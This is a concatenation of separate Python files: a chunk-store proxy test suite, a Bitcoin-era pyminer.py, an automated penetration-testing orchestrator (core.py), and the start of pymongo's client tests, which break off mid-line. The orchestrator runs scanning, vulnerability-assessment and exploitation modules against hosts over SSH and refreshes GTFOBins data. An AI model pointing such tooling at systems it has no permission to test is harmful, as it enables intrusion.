httpd = _TokenHTTPProxyServer((proxy_host, proxy_port), _TokenHTTPProxyHandler)
httpd.target = url
httpd.session = requests.Session()
httpd.auth = _AWSAuth(cls.credentials)
httpd.initial_request_time = {}
cls.httpd_thread = threading.Thread(target=httpd.serve_forever)
cls.httpd_thread.start()
# We delay setting cls.httpd until we've launched serve_forever,
# because teardown calls httpd.shutdown and that hangs if
# serve_forever wasn't called.
cls.httpd = httpd
cls.proxy_url = f'http://{proxy_host}:{proxy_port}'
elif url != cls.httpd.target:
raise RuntimeError('Cannot use multiple target URLs with http proxy')
# The token authorises the standard bucket and anything starting with PREFIX
token = encode_jwt({'alg': 'ES256', 'typ': 'JWT'}, {'prefix': [BUCKET, PREFIX]})
kwargs.setdefault('token', token)
return super().prepare_store_args(cls.proxy_url, credentials=None, **kwargs)
def test_public_read(self):
# Disable this test defined in the base class because it involves creating
# buckets, which is not done with tokens but rather with credentials.
pass
def test_unauthorised_bucket(self):
with assert_raises(InvalidToken):
self.store.is_complete('unauthorised_bucket')
def _put_chunk(self, suggestion):
"""Put a chunk into the store and form an array name containing suggestion."""
var_name = 'x'
slices = (slice(3, 5),)
array_name = self.array_name(var_name)
chunk = getattr(self, var_name)[slices]
self.store.create_array(array_name)
self.store.put_chunk(array_name, slices, chunk)
return chunk, slices, self.store.join(array_name, suggestion)
@timed(0.9 + 0.2)
def test_recover_from_server_errors(self):
chunk, slices, array_name = self._put_chunk(
'please-respond-with-500-for-0.8-seconds')
# With the RETRY settings of 3 status retries, backoff factor of 0.1 s
# and SUGGESTED_STATUS_DELAY of 0.1 s we get the following timeline
# (indexed by seconds):
# 0.0 - access chunk for the first time
# 0.1 - response is 500, immediately try again (retry #1)
# 0.2 - response is 500, back off for 2 * 0.1 seconds
# 0.4 - retry #2
# 0.5 - response is 500, back off for 4 * 0.1 seconds
# 0.9 - retry #3 (the final attempt) - server should now be fixed
# 0.9 - success!
self.store.get_chunk(array_name, slices, chunk.dtype)
@timed(0.9 + 0.4)
def test_persistent_server_errors(self):
chunk, slices, array_name = self._put_chunk(
'please-respond-with-502-for-1.2-seconds')
# After 0.9 seconds the client gives up and returns with failure 0.1 s later
with assert_raises(ChunkNotFound):
self.store.get_chunk(array_name, slices, chunk.dtype)
@timed(0.6 + 0.2)
def test_recover_from_read_truncated_within_npy_header(self):
chunk, slices, array_name = self._put_chunk(
'please-truncate-read-after-60-bytes-for-0.4-seconds')
# With the RETRY settings of 3 status retries and backoff factor of 0.1 s
# we get the following timeline (indexed by seconds):
# 0.0 - access chunk for the first time
# 0.0 - response is 200 but truncated, immediately try again (retry #1)
# 0.0 - response is 200 but truncated, back off for 2 * 0.1 seconds
# 0.2 - retry #2, response is 200 but truncated, back off for 4 * 0.1 seconds
# 0.6 - retry #3 (the final attempt) - server should now be fixed
# 0.6 - success!
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Truncated read not recovered')
@timed(0.6 + 0.2)
def test_recover_from_read_truncated_within_npy_array(self):
chunk, slices, array_name = self._put_chunk(
'please-truncate-read-after-129-bytes-for-0.4-seconds')
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Truncated read not recovered')
@timed(0.6 + 0.4)
def test_persistent_truncated_reads(self):
chunk, slices, array_name = self._put_chunk(
'please-truncate-read-after-60-bytes-for-0.8-seconds')
# After 0.6 seconds the client gives up
with assert_raises(ChunkNotFound):
self.store.get_chunk(array_name, slices, chunk.dtype)
@timed(READ_PAUSE + 0.2)
def test_handle_read_paused_within_npy_header(self):
chunk, slices, array_name = self._put_chunk('please-pause-read-after-60-bytes')
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Paused read failed')
@timed(READ_PAUSE + 0.2)
def test_handle_read_paused_within_npy_array(self):
chunk, slices, array_name = self._put_chunk('please-pause-read-after-129-bytes')
chunk_retrieved = self.store.get_chunk(array_name, slices, chunk.dtype)
assert_array_equal(chunk_retrieved, chunk, 'Paused read failed')
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The MTcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class MTcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = MTcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
core.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pympler import tracker
import configparser
from datetime import datetime
from core.gtfobins_scraper import get_gtfobin
import time
from core.redis_client import RedisClient
from database.models import RegressionTests, Runs
from core.ssh_session import Session
import logging
import sys
from core.constants import EX, EXTERNAL, IG, INTERNAL, VA, ModuleStages, RunStatus
import importlib
import json
import socket
from threading import Thread
from multiprocessing import Process
from core.helper import (
create_new_target,
get_module,
get_module_config,
get_module_types,
logger_class,
os_name,
python_version,
remove_suffix,
tool_config,
)
from database.db import check_db, db_con
import argparse
import os
import gc
from jumpssh.exception import ConnectionError
logger = logging.getLogger(__name__)
# Process specific variables
_session = None # Holds SSH Session object
_db_run = None # Run Row input for specific run
_redis = None
_latest_scan = None
timer_start = 0 # Timer for run
"""
Get scan id
"""
def get_scan_id():
global _db_run
return _db_run.id
"""
Initializes the program
"""
def load():
# Get args
# args = get_args()
# Read from command line
while True:
target = read_cli()
if target is not False:
# Create process
p = Process(
target=scanner_start,
args=(
target,
),
)
p.start()
"""
Function to get all modules for specific target with a certain type
Adds thread to threads array
"""
def thread_module_types(threads, config, type_, target_type):
global _session
logger.info(f"Running {target_type} {type_}")
# Append modules
for module in get_module_types(type_, target_type):
module = module.lower()
# Check if is in config file
if config.has_section(module.capitalize()):
module_config = config[module.capitalize()]
# Check if module should run
if module_config["enabled"] == "True":
# Check type, use Nmap result to run specific tools
cls = get_module(module)
# Run IG independantly from others
if type_ == IG:
threads.append(
Thread(
target=run_module,
args=(
cls(
get_module_config(config, module),
config["General"],
_session,
{},
),
),
)
)
else:
# Check if Nmap result exists, add to payload
if cls._target_type == EXTERNAL:
# Check which tools that can be executed, send payload with ports
try:
data = {}
with open(
f"{os.getcwd()}/targets/{config['General']['target']}/results/nmap_result.json",
"r"
) as f:
data = json.load(f)
payload = {"ports": []}
# Make into list
if type(data["nmaprun"]["host"]["ports"]["port"]) is dict:
data["nmaprun"]["host"]["ports"]["port"] = [data["nmaprun"]["host"]["ports"]["port"]]
# add all services
if "all" in cls._services:
for port in data["nmaprun"]["host"]["ports"]["port"]:
if port["state"]["@state"] == "open":
payload["ports"].append((port["@portid"], port["service"]["@name"]))
# add ports with specific services
else:
for port in data["nmaprun"]["host"]["ports"]["port"]:
if (
port["service"]["@name"] in cls._services
and port["state"]["@state"] == "open"
):
payload["ports"].append((port["@portid"], port["service"]["@name"]))
threads.append(
Thread(
target=run_module,
args=(
cls(
get_module_config(config, module),
config["General"],
_session,
payload,
),
),
)
)
except IOError:
logger.warn(
f"Portscanning result not present, skipping running module: {module.capitalize()}"
)
elif cls._target_type == INTERNAL:
try:
threads.append(
Thread(
target=run_module,
args=(
cls(
get_module_config(config, module),
config["General"],
_session,
{},
),
),
)
)
except IOError:
logger.warn(
f"Sysaudit result not present, skipping running module: {module.capitalize()}"
)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
del threads[:]
logger.info(f"Finished running {target_type} {type_}")
"""
Function to run all regression tests saved
"""
def regression_tests(threads, target):
global _latest_scan
db_session = db_con()
if _latest_scan is not None:
# Update db
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"regression": RunStatus.RUNNING
})
db_session.commit()
# Get latest scan
latest_scan = db_session.query(Runs). \
filter(Runs.id == _latest_scan). \
join(RegressionTests). \
first()
db_session.expire_on_commit = False
# Go through all test cases
for test in latest_scan.regression_tests:
threads.append(
Thread(target=run_regtest, args=(test, target))
)
# Update db
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"regression": RunStatus.FINISHED
})
db_session.commit()
"""
Main method for running the scanner for the target
"""
def scanner_start(target):
global _session, _db_run, timer_start, _redis, _latest_scan
# Config
tool_conf = tool_config()["General"]
# Get latest scan
db_session = db_con()
latest_scan = db_session.query(Runs). \
filter(Runs.target == target). \
order_by(Runs.id.desc()). \
first()
if latest_scan:
_latest_scan = latest_scan.id
# Create db entry for run
_db_run = Runs(target=target)
db_session.add(_db_run)
db_session.commit()
print(f"----- Starting scan on {target}, SCANID: {_db_run.id}------")
# Tracker
if tool_conf["log_level"] == "DEBUG":
tr = tracker.SummaryTracker()
tr.print_diff()
# Set logging file path
if tool_conf["log_level"] == "DEBUG":
level = logging.DEBUG
elif tool_conf["log_level"] == "INFO":
level = logging.INFO
elif tool_conf["log_level"] == "WARN":
level = logging.WARN
else:
level = logging.ERROR
logging.basicConfig(
filename=os.path.join(os.getcwd(), f"targets/{target}/run_{_db_run.id}.log"),
level=level,
format="%(asctime)s [%(levelname)s] %(message)s",
)
# Timer start
logger.info("Timer started for tool execution")
timer_start = int(round(time.time() * 1000))
# Connect to Redis
_redis = RedisClient(scan_id=_db_run.id)
# Read config file for target
config = configparser.ConfigParser()
config.read(os.path.join(f"{os.getcwd()}/targets", target) + "/config.ini")
# Get topology
topology = {}
with open(f"{os.getcwd()}/targets/{target}/topology.json") as f:
topology = json.load(f)
# Setup Jumpssh
_session = Session(topology, target)
try:
_session.connect_ssh()
except ConnectionError as e:
logger.error(e)
return False
# Create tmp directory
try:
logger.info(
f"Creating tempory directory at intermediate and target host: {tool_conf['rlocation']}"
)
_session.run_cmd(f"mkdir {tool_conf['rlocation']}")
_session.run_cmd_target(f"mkdir {tool_conf['rlocation']}")
except Exception as e:
logger.error(e)
# Array to hold threads
main_threads = []
# Start the regression tests, external and internal independant from eachother
# Start only regression if set to true
if config["General"]["regression"] == "True":
regression_tests(main_threads, target)
main_threads.append(Thread(target=thread_independent_stages, args=(config, EXTERNAL,)))
# Skip internal if SSH connection not available at target
if _session.target_connected():
main_threads.append(Thread(target=thread_independent_stages, args=(config, INTERNAL,)))
else:
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"internal_ig": RunStatus.FINISHED,
"internal_va": RunStatus.FINISHED,
"internal_ex": RunStatus.FINISHED
})
db_session.commit()
for thread in main_threads:
thread.start()
for thread in main_threads:
thread.join()
del main_threads[:]
# Remove temporary directory
try:
tool_conf = tool_config()["General"]
logger.info(
f"Removing tempory directory at intermediate and target host: {tool_conf['rlocation']}"
)
_session.run_cmd(f"rm -rf {tool_conf['rlocation']}")
_session.run_cmd_target(f"rm -rf {tool_conf['rlocation']}")
except Exception as e:
logger.error(e)
# Disconnect from all SSH
_session.disconnect()
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
"finished": datetime.utcnow()
})
db_session.commit()
# Disconnect from redis
_redis.close()
# Timer end
logger.info(
f"Timer ended for tool execution, took {int(round(time.time() * 1000)) - timer_start}ms to run"
)
# Collect garbage
gc.collect()
# Log memory summary
if tool_conf["log_level"] == "DEBUG":
tr.print_diff()
tr.print_diff()
def thread_independent_stages(config, type):
threads = []
db_session = db_con()
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_ig": RunStatus.RUNNING
})
db_session.commit()
thread_module_types(threads, config, IG, type)
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_ig": RunStatus.FINISHED,
f"{type.lower()}_va": RunStatus.RUNNING
})
db_session.commit()
thread_module_types(threads, config, VA, type)
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_va": RunStatus.FINISHED,
f"{type.lower()}_ex": RunStatus.RUNNING
})
db_session.commit()
thread_module_types(threads, config, EX, type)
db_session.query(Runs). \
filter(Runs.id == _db_run.id). \
update({
f"{type.lower()}_ex": RunStatus.FINISHED
})
db_session.commit()
"""
Runs a specific module
"""
def run_module(module):
global _redis
module_name = remove_suffix(module.__class__.__name__, "Module")
_redis.module_publish(module_name, ModuleStages.REMOVING, RunStatus.RUNNING)
# Init module
logger_class(module, "Removing old module result", "debug")
module.remove_old_result()
logger_class(module, "Finished removing old module", "debug")
_redis.module_publish(module_name, ModuleStages.REMOVING, RunStatus.FINISHED)
# Init module
_redis.module_publish(module_name, ModuleStages.INIT, RunStatus.RUNNING)
logger_class(module, "Initializing module", "debug")
module.init()
logger_class(module, "Finished initializing module", "debug")
_redis.module_publish(module_name, ModuleStages.INIT, RunStatus.FINISHED)
# Run module
_redis.module_publish(module_name, ModuleStages.RUN, RunStatus.RUNNING)
logger_class(module, "Running module", "debug")
module.run()
logger_class(module, "Finished running module", "debug")
_redis.module_publish(module_name, ModuleStages.RUN, RunStatus.FINISHED)
# Handle result
_redis.module_publish(module_name, ModuleStages.GET, RunStatus.RUNNING)
logger_class(module, "Getting result", "debug")
module.get_result()
logger_class(module, "Finished getting result", "debug")
_redis.module_publish(module_name, ModuleStages.GET, RunStatus.FINISHED)
# Parse module result
_redis.module_publish(module_name, ModuleStages.PARSE, RunStatus.RUNNING)
logger_class(module, "Parsing result", "debug")
module.parse()
logger_class(module, "Finished parsing result", "debug")
_redis.module_publish(module_name, ModuleStages.PARSE, RunStatus.FINISHED)
# Check regression
_redis.module_publish(module_name, ModuleStages.REGTEST, RunStatus.RUNNING)
logger_class(module, "Checking module regtests", "debug")
module.check_regtests()
logger_class(module, "Finished checking module regtests", "debug")
_redis.module_publish(module_name, ModuleStages.REGTEST, RunStatus.FINISHED)
"""
Creates and runs a regtest
"""
def run_regtest(test_entry, target):
global _session
db_session = db_con()
test_entry = db_session.query(test_entry)
module_name = test_entry.module
logger.debug(f"Running regression test {module_name.capitalize()}")
# Get target type from module
cls_module = getattr(
importlib.import_module(f"modules.{module_name.lower()}"),
f"{module_name.capitalize()}Module",
)
target_type = cls_module._target_type
# Create regtest module
cls = getattr(
importlib.import_module(f"modules.{module_name.lower()}"),
f"{test_entry.name}Regression",
)
# Create regression test object
reg_obj = cls(_session, test_entry.payload, test_entry.config, target_type, target)
# Remove old result
reg_obj.remove_old_result()
# Run regtest
reg_obj.run()
# Get result
reg_obj.get_result()
# Parse result
reg_obj.parse()
logger.debug(f"Finished running regression test {module_name.capitalize()}")
"""
Get CLI arguments
"""
def get_args():
parser = argparse.ArgumentParser("python main.py")
# parser.add_argument('-u', '--user', help="Root username", required=True)
# parser.add_argument('-p', '--password', help="Root password", required=True)
return parser.parse_args()
"""
Specify which target to run against
"""
def read_cli():
target = input("Choose target: ")
# Don't allow empty inputs
if not target:
return False
try:
# Check if valid ip adress
socket.inet_aton(target)
# Check if target exists
if os.path.isdir(os.path.join(f"{os.getcwd()}/targets", target)):
print(f"Starting scan for target: {target}")
return target
else:
# Create new target
print(f"{target} does not exists, creating new folder")
create_new_target(target)
print(f"Folder for {target} created, please configure it before retrying")
return False
except Exception:
return False
"""
Checks that all dependencies are present
"""
def check_dependencies():
# Check platform essentials
if python_version() == 2:
sys.exit("Python2 is not supported. Run the tool with Python3!")
if "linux" not in os_name():
sys.exit("The tool can only be run on Linux Distributions!")
# Check if modules are installed on tool host
# Also check if modules are installed on target machine
# Check if DB is up & migrate new table changes
check_db()
# Update GTFOBIN
if tool_config()["General"]["gtfobin_update"] == "True":
print("Updating GTFOBIN")
get_gtfobin()
print("Finished updating GTFOBIN")
|
test_client.py
|
# Copyright 2013-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the mongo_client module."""
import contextlib
import datetime
import os
import socket
import struct
import sys
import time
import traceback
import warnings
sys.path[0:0] = [""]
from bson import BSON
from bson.codec_options import CodecOptions
from bson.py3compat import thread, u
from bson.son import SON
from bson.tz_util import utc
from pymongo import auth, message
from pymongo.cursor import CursorType
from pymongo.database import Database
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidName,
OperationFailure,
CursorNotFound,
NetworkTimeout,
InvalidURI)
from pymongo.message import _CursorAddress
from pymongo.mongo_client import MongoClient
from pymongo.pool import SocketInfo
from pymongo.read_preferences import ReadPreference
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.server_type import SERVER_TYPE
from pymongo.write_concern import WriteConcern
from test import (client_context,
client_knobs,
host,
pair,
port,
SkipTest,
unittest,
IntegrationTest,
db_pwd,
db_user,
MockClientTest)
from test.pymongo_mocks import MockClient
from test.utils import (assertRaisesExactly,
delay,
remove_all_users,
server_is_master_with_slave,
get_pool,
one,
connected,
wait_until,
rs_or_single_client,
rs_or_single_client_noauth,
lazy_client_trial,
NTHREADS)
class ClientUnitTest(unittest.TestCase):
"""MongoClient tests that don't require a server."""
@classmethod
def setUpClass(cls):
cls.client = MongoClient(host, port, connect=False,
serverSelectionTimeoutMS=100)
def test_keyword_arg_defaults(self):
client = MongoClient(socketTimeoutMS=None,
connectTimeoutMS=20000,
waitQueueTimeoutMS=None,
waitQueueMultiple=None,
socketKeepAlive=False,
replicaSet=None,
read_preference=ReadPreference.PRIMARY,
ssl=False,
ssl_keyfile=None,
ssl_certfile=None,
ssl_cert_reqs=0, # ssl.CERT_NONE
ssl_ca_certs=None,
connect=False,
serverSelectionTimeoutMS=12000)
options = client._MongoClient__options
pool_opts = options.pool_options
self.assertEqual(None, pool_opts.socket_timeout)
# socket.Socket.settimeout takes a float in seconds
self.assertEqual(20.0, pool_opts.connect_timeout)
self.assertEqual(None, pool_opts.wait_queue_timeout)
self.assertEqual(None, pool_opts.wait_queue_multiple)
self.assertFalse(pool_opts.socket_keepalive)
self.assertEqual(None, pool_opts.ssl_context)
self.assertEqual(None, options.replica_set_name)
self.assertEqual(ReadPreference.PRIMARY, client.read_preference)
self.assertAlmostEqual(12, client.server_selection_timeout)
def test_types(self):
self.assertRaises(TypeError, MongoClient, 1)
self.assertRaises(TypeError, MongoClient, 1.14)
self.assertRaises(TypeError, MongoClient, "localhost", "27017")
self.assertRaises(TypeError, MongoClient, "localhost", 1.14)
self.assertRaises(TypeError, MongoClient, "localhost", [])
self.assertRaises(ConfigurationError, MongoClient, [])
def test_max_pool_size_zero(self):
with self.assertRaises(ValueError):
MongoClient(maxPoolSize=0)
def test_get_db(self):
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, self.client, "")
self.assertRaises(InvalidName, make_db, self.client, "te$t")
self.assertRaises(InvalidName, make_db, self.client, "te.t")
self.assertRaises(InvalidName, make_db, self.client, "te\\t")
self.assertRaises(InvalidName, make_db, self.client, "te/t")
self.assertRaises(InvalidName, make_db, self.client, "te st")
self.assertTrue(isinstance(self.client.test, Database))
self.assertEqual(self.client.test, self.client["test"])
self.assertEqual(self.client.test, Database(self.client, "test"))
def test_get_database(self):
codec_options = CodecOptions(tz_aware=True)
write_concern = WriteConcern(w=2, j=True)
db = self.client.get_database(
'foo', codec_options, ReadPreference.SECONDARY, write_concern)
self.assertEqual('foo', db.name)
self.assertEqual(codec_options, db.codec_options)
self.assertEqual(ReadPreference.SECONDARY, db.read_preference)
self.assertEqual(write_concern, db.write_concern)
def test_getattr(self):
self.assertTrue(isinstance(self.client['_does_not_exist'], Database))
with self.assertRaises(AttributeError) as context:
self.client._does_not_exist
# Message should be:
# "AttributeError: MongoClient has no attribute '_does_not_exist'. To
# access the _does_not_exist database, use client['_does_not_exist']".
self.assertIn("has no attribute '_does_not_exist'",
str(context.exception))
def test_iteration(self):
def iterate():
[a for a in self.client]
self.assertRaises(TypeError, iterate)
def test_get_default_database(self):
c = MongoClient("mongodb://%s:%d/foo" % (host, port), connect=False)
self.assertEqual(Database(c, 'foo'), c.get_default_database())
def test_get_default_database_error(self):
# URI with no database.
c = MongoClient("mongodb://%s:%d/" % (host, port), connect=False)
self.assertRaises(ConfigurationError, c.get_default_database)
def test_get_default_database_with_authsource(self):
# Ensure we distinguish database name from authSource.
uri = "mongodb://%s:%d/foo?authSource=src" % (host, port)
c = MongoClient(uri, connect=False)
self.assertEqual(Database(c, 'foo'), c.get_default_database())
class TestClient(IntegrationTest):
def test_max_idle_time_reaper(self):
with client_knobs(kill_cursor_frequency=0.1):
# Assert reaper doesn't remove sockets when maxIdleTimeMS not set
client = MongoClient(host, port)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(1)
self.assertEqual(1, len(server._pool.sockets))
self.assertTrue(sock_info in server._pool.sockets)
# Assert reaper removes idle socket and replaces it with a new one
client = MongoClient(host, port, maxIdleTimeMS=.5, minPoolSize=1)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(2)
self.assertEqual(1, len(server._pool.sockets))
self.assertFalse(sock_info in server._pool.sockets)
# Assert reaper has removed idle socket and NOT replaced it
client = MongoClient(host, port, maxIdleTimeMS=.5)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}):
pass
time.sleep(1)
self.assertEqual(0, len(server._pool.sockets))
def test_min_pool_size(self):
with client_knobs(kill_cursor_frequency=.1):
client = MongoClient(host, port)
server = client._get_topology().select_server(any_server_selector)
time.sleep(1)
self.assertEqual(0, len(server._pool.sockets))
# Assert that pool started up at minPoolSize
client = MongoClient(host, port, minPoolSize=10)
server = client._get_topology().select_server(any_server_selector)
time.sleep(1)
self.assertEqual(10, len(server._pool.sockets))
# Assert that if a socket is closed, a new one takes its place
with server._pool.get_socket({}) as sock_info:
sock_info.close()
time.sleep(1)
self.assertEqual(10, len(server._pool.sockets))
self.assertFalse(sock_info in server._pool.sockets)
def test_max_idle_time_checkout(self):
with client_knobs(kill_cursor_frequency=99999999):
client = MongoClient(host, port, maxIdleTimeMS=.5)
time.sleep(1)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(1)
with server._pool.get_socket({}) as new_sock_info:
self.assertNotEqual(sock_info, new_sock_info)
self.assertEqual(1, len(server._pool.sockets))
self.assertFalse(sock_info in server._pool.sockets)
self.assertTrue(new_sock_info in server._pool.sockets)
client = MongoClient(host, port)
server = client._get_topology().select_server(any_server_selector)
with server._pool.get_socket({}) as sock_info:
pass
time.sleep(1)
with server._pool.get_socket({}) as new_sock_info:
self.assertEqual(sock_info, new_sock_info)
self.assertEqual(1, len(server._pool.sockets))
def test_constants(self):
# Set bad defaults.
MongoClient.HOST = "somedomainthatdoesntexist.org"
MongoClient.PORT = 123456789
with self.assertRaises(AutoReconnect):
connected(MongoClient(serverSelectionTimeoutMS=10))
# Override the defaults. No error.
connected(MongoClient(host, port))
# Set good defaults.
MongoClient.HOST = host
MongoClient.PORT = port
# No error.
connected(MongoClient())
def test_init_disconnected(self):
c = rs_or_single_client(connect=False)
# is_primary causes client to block until connected
self.assertIsInstance(c.is_primary, bool)
c = rs_or_single_client(connect=False)
self.assertIsInstance(c.is_mongos, bool)
c = rs_or_single_client(connect=False)
self.assertIsInstance(c.max_pool_size, int)
self.assertIsInstance(c.nodes, frozenset)
c = rs_or_single_client(connect=False)
self.assertEqual(c.codec_options, CodecOptions())
self.assertIsInstance(c.max_bson_size, int)
c = rs_or_single_client(connect=False)
self.assertFalse(c.primary)
self.assertFalse(c.secondaries)
c = rs_or_single_client(connect=False)
self.assertIsInstance(c.max_write_batch_size, int)
if client_context.is_rs:
# The primary's host and port are from the replica set config.
self.assertIsNotNone(c.address)
else:
self.assertEqual(c.address, (host, port))
bad_host = "somedomainthatdoesntexist.org"
c = MongoClient(bad_host, port, connectTimeoutMS=1,
serverSelectionTimeoutMS=10)
self.assertRaises(ConnectionFailure, c.pymongo_test.test.find_one)
def test_init_disconnected_with_auth(self):
uri = "mongodb://user:pass@somedomainthatdoesntexist"
c = MongoClient(uri, connectTimeoutMS=1,
serverSelectionTimeoutMS=10)
self.assertRaises(ConnectionFailure, c.pymongo_test.test.find_one)
def test_equality(self):
c = connected(rs_or_single_client())
self.assertEqual(client_context.rs_or_standalone_client, c)
# Explicitly test inequality
self.assertFalse(client_context.rs_or_standalone_client != c)
def test_host_w_port(self):
with self.assertRaises(ValueError):
connected(MongoClient("%s:1234567" % host, connectTimeoutMS=1,
